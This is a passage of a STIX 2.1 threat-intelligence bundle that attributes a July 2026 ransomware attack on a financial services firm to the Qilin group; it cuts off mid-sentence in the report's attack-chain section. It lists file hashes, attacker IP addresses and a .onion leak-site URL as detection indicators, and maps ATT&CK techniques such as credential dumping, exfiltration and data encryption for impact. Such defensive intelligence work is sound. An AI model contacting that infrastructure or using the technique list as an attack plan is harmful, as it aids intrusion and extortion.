    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--51cf8a7e-68c5-5080-ab86-aff4ad685449",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "hash_md5: d309e3d77ed6a336eb3ad263ddf9db90",
      "pattern": "[file:hashes.MD5 = 'd309e3d77ed6a336eb3ad263ddf9db90']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T19:06:40Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--cb1a4613-d7b6-5cc7-9cfc-606881f35d8c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "indicator--51cf8a7e-68c5-5080-ab86-aff4ad685449"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--6604dae4-b6ae-5ecb-a032-e2b6a6ba7567",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "hash_md5: d6e7547ad7dfd1fbc62e8282aebcc391",
      "pattern": "[file:hashes.MD5 = 'd6e7547ad7dfd1fbc62e8282aebcc391']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T19:06:40Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--04b367ac-3882-5a72-b51a-7509378c3f5f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "indicator--6604dae4-b6ae-5ecb-a032-e2b6a6ba7567"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--4c572a30-2af9-5fce-b55a-14782d433160",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "hash_md5: dd42c3e017889c107a81da78d87dc8af",
      "pattern": "[file:hashes.MD5 = 'dd42c3e017889c107a81da78d87dc8af']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T19:06:40Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--4237123c-25d2-53b0-9817-ed5a17a8cdab",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "indicator--4c572a30-2af9-5fce-b55a-14782d433160"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--fd48eec0-b429-5dc0-9ab7-a2cc7046bdc9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "hash_md5: e01776ec67b9f1ae780c3e24ecc4bf06",
      "pattern": "[file:hashes.MD5 = 'e01776ec67b9f1ae780c3e24ecc4bf06']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T19:06:40Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b3ac3941-c715-5dcc-8ba6-b01e193b3c5d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "indicator--fd48eec0-b429-5dc0-9ab7-a2cc7046bdc9"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--9c966cfa-4461-5e06-9c11-3212afb7dc47",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "hash_md5: e4c1add9f7606e3fa57976b908b4b375",
      "pattern": "[file:hashes.MD5 = 'e4c1add9f7606e3fa57976b908b4b375']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T19:06:40Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--deee7281-25a9-5796-834c-f79dbce697da",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "indicator--9c966cfa-4461-5e06-9c11-3212afb7dc47"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--6ad856fd-6fb1-521f-996c-d1c76c88eda1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "hash_md5: ea1f8794c73b26724314e5356f1f4128",
      "pattern": "[file:hashes.MD5 = 'ea1f8794c73b26724314e5356f1f4128']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T19:06:40Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--fd13ec92-3f88-5ddf-8acc-34b2e480326d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "indicator--6ad856fd-6fb1-521f-996c-d1c76c88eda1"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--04431f9b-e5bf-5b75-a0f6-032509fae207",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "hash_md5: f588802958c35fe18eb87bc36651a3d1",
      "pattern": "[file:hashes.MD5 = 'f588802958c35fe18eb87bc36651a3d1']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T19:06:40Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--188524fa-b1a1-52fa-aef5-5429b399ed51",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "indicator--04431f9b-e5bf-5b75-a0f6-032509fae207"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--5f0885b8-d3f6-5c06-8776-711dc19b2ed0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "hash_md5: f982da00c547913fd0ae7d0da0fc77e7",
      "pattern": "[file:hashes.MD5 = 'f982da00c547913fd0ae7d0da0fc77e7']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T19:06:40Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--4002fefc-230c-563b-b41e-d4b6efc2344b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "indicator--5f0885b8-d3f6-5c06-8776-711dc19b2ed0"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--3dbaf54b-51af-5b66-9b71-c849b6f38303",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "hash_md5: fdc6848dad660414bed9ad1b381cf6e3",
      "pattern": "[file:hashes.MD5 = 'fdc6848dad660414bed9ad1b381cf6e3']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T19:06:40Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ef2fe42f-19ba-5f92-867e-e9540f8291ab",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "indicator--3dbaf54b-51af-5b66-9b71-c849b6f38303"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--c95b3912-73d9-5d3e-be27-a028cdc5a414",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "ip: 176.113.115.209",
      "pattern": "[ipv4-addr:value = '176.113.115.209']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T19:06:40Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--221c6a18-2ad3-5a9b-a147-91984bd7a254",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "indicator--c95b3912-73d9-5d3e-be27-a028cdc5a414"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--e4ad2db4-b621-55cb-8205-f49be432f9e4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "ip: 176.113.115.97",
      "pattern": "[ipv4-addr:value = '176.113.115.97']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T19:06:40Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--4323ec05-c52f-5977-9753-c82998bace28",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "indicator--e4ad2db4-b621-55cb-8205-f49be432f9e4"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--cfd27484-d4f1-5c02-a93f-0625ecaeee83",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "ip: 188.119.66.189",
      "pattern": "[ipv4-addr:value = '188.119.66.189']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T19:06:40Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8f66d462-a337-55f3-b75d-482c5d2ed9de",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "indicator--cfd27484-d4f1-5c02-a93f-0625ecaeee83"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--a5569c74-3fb8-592e-93af-0f83f2c4b918",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "ip: 31.41.244.100",
      "pattern": "[ipv4-addr:value = '31.41.244.100']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T19:06:40Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--49246f6b-ef14-5820-ab40-1a599f85bd00",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "indicator--a5569c74-3fb8-592e-93af-0f83f2c4b918"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--a31c0d28-2857-551f-b1b9-f9b6adf3e6a7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "ip: 85.209.11.49",
      "pattern": "[ipv4-addr:value = '85.209.11.49']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T19:06:40Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c49fca9e-246d-56dd-aa55-04b62f0e203e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "indicator--a31c0d28-2857-551f-b1b9-f9b6adf3e6a7"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--793baf3b-6e65-565e-af6d-d54e9b82ab84",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: http://ijzn3sicrcy7guixkzjkib4ukbiilwc3xhnmby4mcbccnsd7j2rekvqd.onion/site/blog?uuid=abf9c42a-1ce2-43e2-a6ae-ffe1f669d054",
      "pattern": "[url:value = 'http://ijzn3sicrcy7guixkzjkib4ukbiilwc3xhnmby4mcbccnsd7j2rekvqd.onion/site/blog?uuid=abf9c42a-1ce2-43e2-a6ae-ffe1f669d054']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T19:06:40Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ddd94f00-6966-53c7-8173-51865b539e86",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "indicator--793baf3b-6e65-565e-af6d-d54e9b82ab84"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--58d79e59-5f55-57c7-a929-7b6cbc5ab326",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Phishing",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1566",
          "url": "https://attack.mitre.org/techniques/T1566"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2958bf6d-2d52-5632-bc68-7e6a8f559bb1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--20cbbaa0-8f67-5319-a0ed-f5a4910f33c6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5e05d029-d159-5289-9f03-3641066e4011",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Scheduled Task/Job",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1053",
          "url": "https://attack.mitre.org/techniques/T1053"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--94ec6786-3c30-542e-8d64-ca8d2b9d6b3a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "attack-pattern--5e05d029-d159-5289-9f03-3641066e4011"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Privilege Escalation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1068",
          "url": "https://attack.mitre.org/techniques/T1068"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a98a4c9b-5fc1-5a96-919d-dad5c99aae6b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--050d5077-442b-5efa-b26f-551a73b52fb2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Obfuscated Files or Information",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1027",
          "url": "https://attack.mitre.org/techniques/T1027"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7311e6e0-d78d-5ad3-80af-003b9e5be6eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "attack-pattern--050d5077-442b-5efa-b26f-551a73b52fb2"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--fef861e9-3ac4-50b1-aa1a-3ff772ca094e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Masquerading",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1036",
          "url": "https://attack.mitre.org/techniques/T1036"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f606609d-567b-5436-9437-d83d0165da2f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "attack-pattern--fef861e9-3ac4-50b1-aa1a-3ff772ca094e"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Impair Defenses",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1562",
          "url": "https://attack.mitre.org/techniques/T1562"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8d5c03c5-daf3-5981-b9af-98990a0080db",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--633c0a79-a71b-5eb7-9eca-504796091337",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "OS Credential Dumping",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1003",
          "url": "https://attack.mitre.org/techniques/T1003"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a1160b85-6d10-55b0-ab39-77a438741666",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "attack-pattern--633c0a79-a71b-5eb7-9eca-504796091337"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--119922bc-1709-5c39-a91d-5cfccacef48a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Credentials from Web Browsers",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1555",
          "url": "https://attack.mitre.org/techniques/T1555"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5ab18191-391c-5fad-88ed-2ed5e9bea3fa",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "attack-pattern--119922bc-1709-5c39-a91d-5cfccacef48a"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--01b0e09b-1506-5d2d-8ffa-f7854bbc1154",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Account Discovery",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1087",
          "url": "https://attack.mitre.org/techniques/T1087"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--cbd1d9d9-18dc-50d5-ae31-a329612edfd4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "attack-pattern--01b0e09b-1506-5d2d-8ffa-f7854bbc1154"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--f198ff96-24d2-5e63-a16c-7bd8ef92750c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "System Network Configuration Discovery",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1016",
          "url": "https://attack.mitre.org/techniques/T1016"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6a9d842e-1f1b-58b3-b7d3-d9fdffc14c54",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "attack-pattern--f198ff96-24d2-5e63-a16c-7bd8ef92750c"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e36dde55-a247-51ae-915b-0aac12302837",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Network Service Discovery",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1046",
          "url": "https://attack.mitre.org/techniques/T1046"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--020d34f9-6644-518a-8e93-9b7a729689b0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "attack-pattern--e36dde55-a247-51ae-915b-0aac12302837"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e26451c2-381a-5681-88b3-9fe88c4d5e5a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Remote Services",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1021",
          "url": "https://attack.mitre.org/techniques/T1021"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--bf38c6ba-839d-5128-abe6-1bf772e71531",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "attack-pattern--e26451c2-381a-5681-88b3-9fe88c4d5e5a"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--6ef3c5ca-94f5-57f2-924a-8c2f91b71d40",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exfiltration Over Other Network Medium",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1048",
          "url": "https://attack.mitre.org/techniques/T1048"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d43eeb00-5102-5a8c-8569-96dd8e41e3bd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "attack-pattern--6ef3c5ca-94f5-57f2-924a-8c2f91b71d40"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--fad764e9-fecc-5d91-b223-3a136fa315e1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data Obfuscation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1001",
          "url": "https://attack.mitre.org/techniques/T1001"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f8b8cb8e-0241-5982-ae8a-3a490da62d68",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "attack-pattern--fad764e9-fecc-5d91-b223-3a136fa315e1"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--af8a173c-24c5-549d-93d6-e942357a5af7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Proxy",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1090",
          "url": "https://attack.mitre.org/techniques/T1090"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8cbf3e29-7c41-5e35-8393-c60d5c217fc5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "attack-pattern--af8a173c-24c5-549d-93d6-e942357a5af7"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--4c3e7380-a536-599a-8a1e-e402b95df8d6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data Encrypted for Impact",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1486",
          "url": "https://attack.mitre.org/techniques/T1486"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--13af5d08-2e01-5a9e-8223-3ea024ae80ef",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "attack-pattern--4c3e7380-a536-599a-8a1e-e402b95df8d6"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c4eac0b5-7f75-5208-a560-6d98b706ea49",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Inhibit System Recovery",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1490",
          "url": "https://attack.mitre.org/techniques/T1490"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8f4a2f3e-e27f-5fdf-9d97-97ec1da0d3cc",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "attack-pattern--c4eac0b5-7f75-5208-a560-6d98b706ea49"
    },
    {
      "type": "threat-actor",
      "spec_version": "2.1",
      "id": "threat-actor--be75d040-48f9-503f-902a-7fb62b161321",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Qilin"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a197550f-1ee5-52b0-9d5d-5e3fbe25a7fd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "attributed-to",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "threat-actor--be75d040-48f9-503f-902a-7fb62b161321"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Qilin Ransomware Claims New Financial Services Victim",
      "description": "## Overview\n\nThe Qilin ransomware group, first observed in July 2022, has added www.tqfinancials.com, a Financial Services entity, to its list of victims as of July 3, 2026. This group utilizes ransomware written in Golang, supporting multiple encryption modes controlled by the operator. Qilin consistently employs a double extortion model, demanding payment for decryption keys and threatening to release exfiltrated data if demands are not met. The group has claimed a total of 1973 victims, with an average delay of 45.7 days between attack and public claim. The targeting of a financial services organization underscores the group's broad sector targeting and the severe risks of data compromise and business disruption.\n\n## Attack Chain\n\n1.  **Initial Access**: Gaining unauthorized entry, potentially via \"Exploit Public-Facing Application\" or \"Phishing\" as listed in Qilin's TTPs.\n2.  **Execution \u0026 Defense Evasion**: Running malicious code, often using \"Command and Scripting Interpreter: PowerShell\" and employing \"Obfuscated Files or Information\" or tools like 